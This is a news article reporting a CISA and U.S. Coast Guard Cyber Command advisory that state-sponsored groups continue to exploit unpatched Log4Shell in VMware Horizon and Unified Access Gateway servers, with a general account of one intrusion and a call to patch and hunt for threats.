Malicious actors continue to dog VMware Horizon and Unified Access Gateway server deployments, capitalizing on unpatched Log4Shell, the Cybersecurity and Infrastructure Security Agency said Thursday in a joint advisory with the U.S. Coast Guard Cyber Command.
The agencies are calling for organizations to update all VMware Horizon and UAG systems and, if fixes weren't applied in Dec. 2021, organizations should consider their systems compromised and start threat hunting.
The renewed warnings echo fears CISA shared in January. While initial threat activity tied to Log4j was limited, officials worried attackers would lay in wait.
The agencies have observed multiple state-sponsored threat groups exploiting Log4Shell, using the vulnerability to gain access and deploy loader malware to enable remote command and control, CISA said.
In one case, CISA found multiple threat actors compromising an unnamed organization, and observed them moving laterally throughout the production environment. Compromising servers dedicated to security management, certificates and mail relay, and a database with sensitive law enforcement data, the threat actors also gained access to a disaster recovery network.
From there, the threat actors obtained credentials, including administrator accounts, which they used to run loader malware. This maneuver gave them the ability to "remotely monitor a system's desktop, gain reverse shell access, exfiltrate data, and upload and execute additional payload," CISA said.
In a three week period, attackers stole more than 130 gigabytes of security management server data to a foreign IP address, CISA said.
VMware did not respond to Cybersecurity Dive's questions by publication time.